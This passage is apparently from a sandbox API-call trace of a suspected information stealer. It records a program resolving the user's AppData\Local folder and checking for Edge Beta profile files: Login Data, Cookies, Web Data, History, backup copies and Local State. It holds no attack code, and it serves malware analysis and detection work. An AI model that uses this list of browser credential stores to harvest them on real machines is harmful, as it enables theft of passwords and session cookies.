0x5f0000 [0180.769] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x22) returned 0x613860 [0180.769] GetProcessHeap () returned 0x5f0000 [0180.769] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x5) returned 0x61f3d0 [0180.769] ResetEvent (hEvent=0xc) returned 1 [0180.770] WaitForSingleObject (hHandle=0xc, dwMilliseconds=0xffffffff) returned 0x0 [0180.796] GetProcessHeap () returned 0x5f0000 [0180.796] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f3d0 | out: hHeap=0x5f0000) returned 1 [0180.796] GetProcessHeap () returned 0x5f0000 [0180.797] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x613860 | out: hHeap=0x5f0000) returned 1 [0180.797] GetProcessHeap () returned 0x5f0000 [0180.797] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f3b0 | out: hHeap=0x5f0000) returned 1 [0180.797] GetProcessHeap () returned 0x5f0000 [0180.797] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f3c0 | out: hHeap=0x5f0000) returned 1 [0180.797] GetProcessHeap () returned 0x5f0000 [0180.797] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x613320 | out: hHeap=0x5f0000) returned 1 [0180.797] GetProcessHeap () returned 0x5f0000 [0180.797] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x613440 | out: hHeap=0x5f0000) returned 1 [0180.797] GetProcessHeap () returned 0x5f0000 [0180.797] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x1) returned 0x61f3b0 [0180.797] GetProcessHeap () returned 0x5f0000 [0180.797] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x18) returned 0x615ca0 [0180.797] GetProcAddress (hModule=0x7ffb267e0000, lpProcName="SHGetSpecialFolderPathA") returned 0x7ffb26a71450 [0180.797] GetProcessHeap () returned 0x5f0000 [0180.797] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x615ca0 | out: hHeap=0x5f0000) returned 1 [0180.797] SHGetSpecialFolderPathA (in: hwnd=0x0, pszPath=0x5cf2c0, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 1 [0180.797] GetProcessHeap () returned 0x5f0000 [0180.797] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x5) returned 0x61f280 [0180.797] lstrlenA (lpString="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 35 [0180.797] GetProcessHeap () returned 0x5f0000 [0180.797] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x24) returned 0x613320 [0180.797] lstrcpyA (in: lpString1=0x613320, lpString2="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local" [0180.797] GetProcessHeap () returned 0x5f0000 [0180.797] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x24) returned 0x613440 [0180.797] GetProcessHeap () returned 0x5f0000 [0180.797] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x613440, Size=0x95) returned 0x611f60 [0180.797] GetProcessHeap () returned 0x5f0000 [0180.798] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x4b) returned 0x6207d0 [0180.798] GetProcessHeap () returned 0x5f0000 [0180.798] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x6207d0, Size=0xa5) returned 0x624900 [0180.798] GetProcessHeap () returned 0x5f0000 [0180.798] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x53) returned 0x6180b0 [0180.798] GetProcessHeap () returned 0x5f0000 [0180.798] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x6180b0, Size=0xad) returned 0x6249c0 [0180.798] GetProcessHeap () returned 0x5f0000 [0180.798] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x61f3b0, Size=0x57) returned 0x6186b0 [0180.798] GetProcessHeap () returned 0x5f0000 [0180.798] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x6249c0 | out: hHeap=0x5f0000) returned 1 [0180.798] GetProcessHeap () returned 0x5f0000 [0180.798] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x624900 | out: hHeap=0x5f0000) returned 1 [0180.798] GetProcessHeap () returned 0x5f0000 [0180.798] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x611f60 | out: hHeap=0x5f0000) returned 1 [0180.798] GetProcessHeap () returned 0x5f0000 [0180.798] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x613320 | out: hHeap=0x5f0000) returned 1 [0180.798] GetProcessHeap () returned 0x5f0000 [0180.798] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f280 | out: hHeap=0x5f0000) returned 1 [0180.798] GetProcAddress (hModule=0x7ffb262e0000, lpProcName="PathFileExistsA") returned 0x7ffb262f5690 [0180.798] PathFileExistsA (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Edge Beta\\User Data\\Default\\Web Data.bak") returned 0 [0180.799] GetProcessHeap () returned 0x5f0000 [0180.799] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x6186b0 | out: hHeap=0x5f0000) returned 1 [0180.799] GetProcessHeap () returned 0x5f0000 [0180.799] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x23) returned 0x613320 [0180.799] GetProcessHeap () returned 0x5f0000 [0180.799] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x23) returned 0x613440 [0180.799] GetProcessHeap () returned 0x5f0000 [0180.799] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x5) returned 0x61f3b0 [0180.799] lstrlenA (lpString="") returned 0 [0180.799] GetProcessHeap () returned 0x5f0000 [0180.799] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x1) returned 0x61f3c0 [0180.799] lstrcpyA (in: lpString1=0x61f3c0, lpString2="" | out: lpString1="") returned="" [0180.799] GetProcessHeap () returned 0x5f0000 [0180.799] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x23) returned 0x613740 [0180.799] GetProcessHeap () returned 0x5f0000 [0180.799] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x5) returned 0x61f3d0 [0180.799] ResetEvent (hEvent=0xc) returned 1 [0180.799] WaitForSingleObject (hHandle=0xc, dwMilliseconds=0xffffffff) returned 0x0 [0180.830] GetProcessHeap () returned 0x5f0000 [0180.830] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f3d0 | out: hHeap=0x5f0000) returned 1 [0180.830] GetProcessHeap () returned 0x5f0000 [0180.830] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x613740 | out: hHeap=0x5f0000) returned 1 [0180.830] GetProcessHeap () returned 0x5f0000 [0180.830] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f3c0 | out: hHeap=0x5f0000) returned 1 [0180.830] GetProcessHeap () returned 0x5f0000 [0180.830] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f3b0 | out: hHeap=0x5f0000) returned 1 [0180.830] GetProcessHeap () returned 0x5f0000 [0180.830] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x613440 | out: hHeap=0x5f0000) returned 1 [0180.830] GetProcessHeap () returned 0x5f0000 [0180.830] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x613320 | out: hHeap=0x5f0000) returned 1 [0180.830] GetProcessHeap () returned 0x5f0000 [0180.830] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f410 | out: hHeap=0x5f0000) returned 1 [0180.830] GetProcessHeap () returned 0x5f0000 [0180.830] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f360 | out: hHeap=0x5f0000) returned 1 [0180.830] GetProcessHeap () returned 0x5f0000 [0180.830] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f350 | out: hHeap=0x5f0000) returned 1 [0180.830] GetProcessHeap () returned 0x5f0000 [0180.830] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f330 | out: hHeap=0x5f0000) returned 1 [0180.831] lstrlenA (lpString=0x0) returned 0 [0180.831] GetProcessHeap () returned 0x5f0000 [0180.831] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x1) returned 0x61f410 [0180.831] GetProcessHeap () returned 0x5f0000 [0180.831] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x1) returned 0x61f330 [0180.831] GetProcessHeap () returned 0x5f0000 [0180.831] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x1) returned 0x61f350 [0180.831] GetProcessHeap () returned 0x5f0000 [0180.831] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x18) returned 0x615dc0 [0180.831] GetProcAddress (hModule=0x7ffb267e0000, lpProcName="SHGetSpecialFolderPathA") returned 0x7ffb26a71450 [0180.831] GetProcessHeap () returned 0x5f0000 [0180.831] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x615dc0 | out: hHeap=0x5f0000) returned 1 [0180.832] SHGetSpecialFolderPathA (in: hwnd=0x0, pszPath=0x5ce830, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 1 [0180.832] GetProcessHeap () returned 0x5f0000 [0180.832] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x5) returned 0x61f360 [0180.832] lstrlenA (lpString="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 35 [0180.832] GetProcessHeap () returned 0x5f0000 [0180.832] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x24) returned 0x613320 [0180.832] lstrcpyA (in: lpString1=0x613320, lpString2="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local" [0180.832] GetProcessHeap () returned 0x5f0000 [0180.832] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x24) returned 0x613440 [0180.832] GetProcessHeap () returned 0x5f0000 [0180.832] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x613440, Size=0x95) returned 0x611f60 [0180.832] GetProcessHeap () returned 0x5f0000 [0180.832] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x4b) returned 0x6205a0 [0180.832] GetProcessHeap () returned 0x5f0000 [0180.832] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x6205a0, Size=0xa3) returned 0x624900 [0180.833] GetProcessHeap () returned 0x5f0000 [0180.833] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x52) returned 0x618b90 [0180.833] GetProcessHeap () returned 0x5f0000 [0180.833] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x618b90, Size=0xab) returned 0x6249c0 [0180.833] GetProcessHeap () returned 0x5f0000 [0180.833] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x61f350, Size=0x56) returned 0x6188f0 [0180.833] GetProcessHeap () returned 0x5f0000 [0180.833] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x6249c0 | out: hHeap=0x5f0000) returned 1 [0180.833] GetProcessHeap () returned 0x5f0000 [0180.833] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x624900 | out: hHeap=0x5f0000) returned 1 [0180.833] GetProcessHeap () returned 0x5f0000 [0180.833] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x611f60 | out: hHeap=0x5f0000) returned 1 [0180.833] GetProcessHeap () returned 0x5f0000 [0180.833] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x613320 | out: hHeap=0x5f0000) returned 1 [0180.833] GetProcessHeap () returned 0x5f0000 [0180.833] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f360 | out: hHeap=0x5f0000) returned 1 [0180.833] GetProcAddress (hModule=0x7ffb262e0000, lpProcName="PathFileExistsA") returned 0x7ffb262f5690 [0180.834] PathFileExistsA (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Edge Beta\\User Data\\Default\\Cookies.bak") returned 0 [0180.834] GetProcessHeap () returned 0x5f0000 [0180.834] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x6188f0 | out: hHeap=0x5f0000) returned 1 [0180.834] GetProcessHeap () returned 0x5f0000 [0180.834] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f330 | out: hHeap=0x5f0000) returned 1 [0180.834] GetProcessHeap () returned 0x5f0000 [0180.834] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f410 | out: hHeap=0x5f0000) returned 1 [0180.834] GetProcessHeap () returned 0x5f0000 [0180.834] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x1) returned 0x61f330 [0180.834] GetProcessHeap () returned 0x5f0000 [0180.834] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x18) returned 0x615ea0 [0180.834] GetProcAddress (hModule=0x7ffb267e0000, lpProcName="SHGetSpecialFolderPathA") returned 0x7ffb26a71450 [0180.834] GetProcessHeap () returned 0x5f0000 [0180.835] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x615ea0 | out: hHeap=0x5f0000) returned 1 [0180.835] SHGetSpecialFolderPathA (in: hwnd=0x0, pszPath=0x5cfbf0, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 1 [0180.835] lstrlenA (lpString="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 35 [0180.835] GetProcessHeap () returned 0x5f0000 [0180.835] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x24) returned 0x613320 [0180.835] lstrcpyA (in: lpString1=0x613320, lpString2="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local" [0180.835] GetProcessHeap () returned 0x5f0000 [0180.835] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x28) returned 0x613440 [0180.835] GetProcessHeap () returned 0x5f0000 [0180.835] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x24) returned 0x6139e0 [0180.835] GetProcessHeap () returned 0x5f0000 [0180.835] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x6139e0, Size=0x95) returned 0x611f60 [0180.835] GetProcessHeap () returned 0x5f0000 [0180.835] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x4b) returned 0x620960 [0180.835] GetProcessHeap () returned 0x5f0000 [0180.835] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x620960, Size=0xa9) returned 0x624900 [0180.835] GetProcessHeap () returned 0x5f0000 [0180.835] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x613320, Size=0x55) returned 0x6184d0 [0180.835] GetProcessHeap () returned 0x5f0000 [0180.835] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x624900 | out: hHeap=0x5f0000) returned 1 [0180.835] GetProcessHeap () returned 0x5f0000 [0180.835] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x611f60 | out: hHeap=0x5f0000) returned 1 [0180.836] GetProcAddress (hModule=0x7ffb262e0000, lpProcName="PathFileExistsA") returned 0x7ffb262f5690 [0180.836] PathFileExistsA (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Edge Beta\\User Data\\Default\\Login Data") returned 0 [0180.836] GetProcessHeap () returned 0x5f0000 [0180.836] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x613440 | out: hHeap=0x5f0000) returned 1 [0180.836] GetProcessHeap () returned 0x5f0000 [0180.836] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x6184d0 | out: hHeap=0x5f0000) returned 1 [0180.836] GetProcessHeap () returned 0x5f0000 [0180.836] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x1) returned 0x61f280 [0180.836] GetProcessHeap () returned 0x5f0000 [0180.836] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x18) returned 0x615f60 [0180.836] GetProcAddress (hModule=0x7ffb267e0000, lpProcName="SHGetSpecialFolderPathA") returned 0x7ffb26a71450 [0180.836] GetProcessHeap () returned 0x5f0000 [0180.837] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x615f60 | out: hHeap=0x5f0000) returned 1 [0180.837] SHGetSpecialFolderPathA (in: hwnd=0x0, pszPath=0x5cfbf0, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 1 [0180.837] lstrlenA (lpString="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 35 [0180.837] GetProcessHeap () returned 0x5f0000 [0180.837] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x24) returned 0x613320 [0180.837] lstrcpyA (in: lpString1=0x613320, lpString2="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local" [0180.837] GetProcessHeap () returned 0x5f0000 [0180.837] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x28) returned 0x613440 [0180.837] GetProcessHeap () returned 0x5f0000 [0180.837] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x24) returned 0x613830 [0180.837] GetProcessHeap () returned 0x5f0000 [0180.837] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x613830, Size=0x95) returned 0x611f60 [0180.837] GetProcessHeap () returned 0x5f0000 [0180.837] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x4b) returned 0x620140 [0180.837] GetProcessHeap () returned 0x5f0000 [0180.837] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x620140, Size=0xa3) returned 0x624900 [0180.837] GetProcessHeap () returned 0x5f0000 [0180.837] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x613320, Size=0x52) returned 0x6185f0 [0180.837] GetProcessHeap () returned 0x5f0000 [0180.837] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x624900 | out: hHeap=0x5f0000) returned 1 [0180.837] GetProcessHeap () returned 0x5f0000 [0180.837] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x611f60 | out: hHeap=0x5f0000) returned 1 [0180.838] GetProcAddress (hModule=0x7ffb262e0000, lpProcName="PathFileExistsA") returned 0x7ffb262f5690 [0180.838] PathFileExistsA (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Edge Beta\\User Data\\Default\\History") returned 0 [0180.838] GetProcessHeap () returned 0x5f0000 [0180.838] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x613440 | out: hHeap=0x5f0000) returned 1 [0180.838] GetProcessHeap () returned 0x5f0000 [0180.838] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x6185f0 | out: hHeap=0x5f0000) returned 1 [0180.838] GetProcessHeap () returned 0x5f0000 [0180.838] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x1) returned 0x61f410 [0180.838] GetProcessHeap () returned 0x5f0000 [0180.838] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x18) returned 0x615d60 [0180.838] GetProcAddress (hModule=0x7ffb267e0000, lpProcName="SHGetSpecialFolderPathA") returned 0x7ffb26a71450 [0180.838] GetProcessHeap () returned 0x5f0000 [0180.838] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x615d60 | out: hHeap=0x5f0000) returned 1 [0180.839] SHGetSpecialFolderPathA (in: hwnd=0x0, pszPath=0x5cfbf0, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 1 [0180.839] lstrlenA (lpString="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 35 [0180.839] GetProcessHeap () returned 0x5f0000 [0180.839] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x24) returned 0x613320 [0180.839] lstrcpyA (in: lpString1=0x613320, lpString2="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local" [0180.839] GetProcessHeap () returned 0x5f0000 [0180.839] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x28) returned 0x613440 [0180.839] GetProcessHeap () returned 0x5f0000 [0180.839] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x24) returned 0x613a10 [0180.839] GetProcessHeap () returned 0x5f0000 [0180.839] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x613a10, Size=0x95) returned 0x611f60 [0180.839] GetProcessHeap () returned 0x5f0000 [0180.839] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x4b) returned 0x620230 [0180.839] GetProcessHeap () returned 0x5f0000 [0180.839] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x620230, Size=0xa5) returned 0x624900 [0180.839] GetProcessHeap () returned 0x5f0000 [0180.839] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x613320, Size=0x53) returned 0x6187d0 [0180.839] GetProcessHeap () returned 0x5f0000 [0180.839] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x624900 | out: hHeap=0x5f0000) returned 1 [0180.839] GetProcessHeap () returned 0x5f0000 [0180.839] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x611f60 | out: hHeap=0x5f0000) returned 1 [0180.840] GetProcAddress (hModule=0x7ffb262e0000, lpProcName="PathFileExistsA") returned 0x7ffb262f5690 [0180.840] PathFileExistsA (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Edge Beta\\User Data\\Default\\Web Data") returned 0 [0180.840] GetProcessHeap () returned 0x5f0000 [0180.840] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x613440 | out: hHeap=0x5f0000) returned 1 [0180.840] GetProcessHeap () returned 0x5f0000 [0180.840] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x6187d0 | out: hHeap=0x5f0000) returned 1 [0180.840] GetProcessHeap () returned 0x5f0000 [0180.840] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x1) returned 0x61f360 [0180.840] GetProcessHeap () returned 0x5f0000 [0180.840] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x18) returned 0x615ca0 [0180.840] GetProcAddress (hModule=0x7ffb267e0000, lpProcName="SHGetSpecialFolderPathA") returned 0x7ffb26a71450 [0180.840] GetProcessHeap () returned 0x5f0000 [0180.840] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x615ca0 | out: hHeap=0x5f0000) returned 1 [0180.841] SHGetSpecialFolderPathA (in: hwnd=0x0, pszPath=0x5cfbf0, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 1 [0180.841] lstrlenA (lpString="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 35 [0180.841] GetProcessHeap () returned 0x5f0000 [0180.841] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x24) returned 0x613320 [0180.841] lstrcpyA (in: lpString1=0x613320, lpString2="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local" [0180.841] GetProcessHeap () returned 0x5f0000 [0180.841] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x28) returned 0x613440 [0180.841] GetProcessHeap () returned 0x5f0000 [0180.841] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x24) returned 0x613b00 [0180.841] GetProcessHeap () returned 0x5f0000 [0180.841] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x613b00, Size=0x95) returned 0x611f60 [0180.841] GetProcessHeap () returned 0x5f0000 [0180.841] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x4b) returned 0x620550 [0180.841] GetProcessHeap () returned 0x5f0000 [0180.841] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x620550, Size=0xb1) returned 0x621b80 [0180.841] GetProcessHeap () returned 0x5f0000 [0180.841] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x613320, Size=0x59) returned 0x6183b0 [0180.841] GetProcessHeap () returned 0x5f0000 [0180.841] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x621b80 | out: hHeap=0x5f0000) returned 1 [0180.841] GetProcessHeap () returned 0x5f0000 [0180.841] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x611f60 | out: hHeap=0x5f0000) returned 1 [0180.841] GetProcAddress (hModule=0x7ffb262e0000, lpProcName="PathFileExistsA") returned 0x7ffb262f5690 [0180.841] PathFileExistsA (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Edge Beta\\User Data\\Default\\..\\Local State") returned 0 [0180.841] GetProcessHeap () returned 0x5f0000 [0180.841] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x613440 | out: hHeap=0x5f0000) returned 1 [0180.841] GetProcessHeap () returned 0x5f0000 [0180.842] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x6183b0 | out: hHeap=0x5f0000) returned 1 [0180.842] GetProcessHeap () returned 0x5f0000 [0180.842] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x1) returned 0x61f3b0 [0180.842] GetProcessHeap () returned 0x5f0000 [0180.842] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x18) returned 0x615f60 [0180.842] GetProcAddress (hModule=0x7ffb267e0000, lpProcName="SHGetSpecialFolderPathA") returned 0x7ffb26a71450 [0180.842] GetProcessHeap () returned 0x5f0000 [0180.842] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x615f60 | out: hHeap=0x5f0000) returned 1 [0180.842] SHGetSpecialFolderPathA (in: hwnd=0x0, pszPath=0x5cfbf0, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 1 [0180.842] lstrlenA (lpString="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 35 [0180.842] GetProcessHeap () returned 0x5f0000 [0180.842] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x24) returned 0x613440 [0180.842] lstrcpyA (in: lpString1=0x613440, lpString2="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local" [0180.842] GetProcessHeap () returned 0x5f0000 [0180.842] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x28) returned 0x613320 [0180.842] GetProcessHeap () returned 0x5f0000 [0180.842] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x24) returned 0x613b30 [0180.842] GetProcessHeap () returned 0x5f0000 [0180.842] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x613b30, Size=0x95) returned 0x611f60 [0180.842] GetProcessHeap () returned 0x5f0000 [0180.842] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x4b) returned 0x620410 [0180.842] GetProcessHeap () returned 0x5f0000 [0180.842] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x620410, Size=0xa3) returned 0x624900 [0180.842] GetProcessHeap () returned 0x5f0000 [0180.842] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x613440, Size=0x52) returned 0x618a10 [0180.842] GetProcessHeap () returned 0x5f0000 [0180.842] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x624900 | out: hHeap=0x5f0000) returned 1 [0180.842] GetProcessHeap () returned 0x5f0000 [0180.842] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x611f60 | out: hHeap=0x5f0000) returned 1 [0180.842] GetProcAddress 